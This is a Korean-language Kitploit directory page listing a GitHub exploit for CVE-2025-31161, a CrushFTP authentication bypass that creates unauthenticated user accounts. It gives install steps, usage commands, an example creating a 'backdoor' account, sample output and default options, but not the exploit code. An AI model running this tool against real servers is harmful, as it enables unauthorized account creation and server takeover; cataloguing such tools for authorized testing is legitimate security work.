Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-31161 — 🛡️ CVE-2025-31161 - CrushFTP 사용자 생성 인증 우회 익스플로잇 | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2025-31161
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-31161

CVE-2025-31161

🛡️ CVE-2025-31161 - CrushFTP 사용자 생성 인증 우회 익스플로잇

저장소 보기
51년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-31161 - CrushFTP 사용자 생성 인증 우회 익스플로잇

CrushFTP Logo

📌 설명

이 Python 익스플로잇은 CVE-2025-31161에 취약한 CrushFTP 서버를 대상으로 합니다. 이 취약점은 인증되지 않은 사용자 계정 생성을 가능하게 하며, WebInterface에 조작된 XML 페이로드를 전송하여 잠재적으로 서버 전체를 장악할 수 있습니다.


⚠️ 면책 조항

이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용해야 합니다.
소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 무단으로 사용하는 것은 불법이며 비윤리적입니다.


🧰 요구 사항

  • Python 3
  • pip3
  • Python 모듈:
    • requests
    • colorama

✅ Python3 및 pip3 설치

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install python3 python3-pip -y

CentOS/RHEL:

root@kitploit:~
sudo yum install python3 python3-pip -y

macOS (Homebrew 사용):

root@kitploit:~
brew install python3

✅ Python 종속성 설치

root@kitploit:~
pip3 install requests colorama

🔧 사용법

root@kitploit:~
python3 CVE-2025-31161.py --target_host <타겟_IP> [--port <포트>] [--target_user <관리자>] [--new_user <사용자명>] [--password <비밀번호>]

🔍 예시

root@kitploit:~
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!

🧪 명령줄 옵션


🖥️ 샘플 출력

root@kitploit:~
[+] 페이로드 준비 중
  [-] 대상 준비 중...
  [-] 대상이 실행 중입니다
[+] 계정 생성 요청 전송 중
  [!] 사용자가 성공적으로 생성되었습니다!

[+] 익스플로잇 완료! 이제 다음 계정으로 로그인할 수 있습니다:
   [*] 사용자명: AuthBypassAccount
   [*] 비밀번호: CorrectHorseBatteryStaple

👨‍💻 작성자

Gaurav Bhattacharjee (G4UR4V007)


📄 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.

도구 다운로드
인수설명기본값
--target_host(필수) 대상 IP 또는 도메인—
--portCrushFTP WebInterface 포트8080
--target_user페이로드에 사용될 관리자 이름crushadmin
--new_user새로 생성할 인증되지 않은 계정AuthBypassAccount
--password새 사용자의 비밀번호CorrectHorseBatteryStaple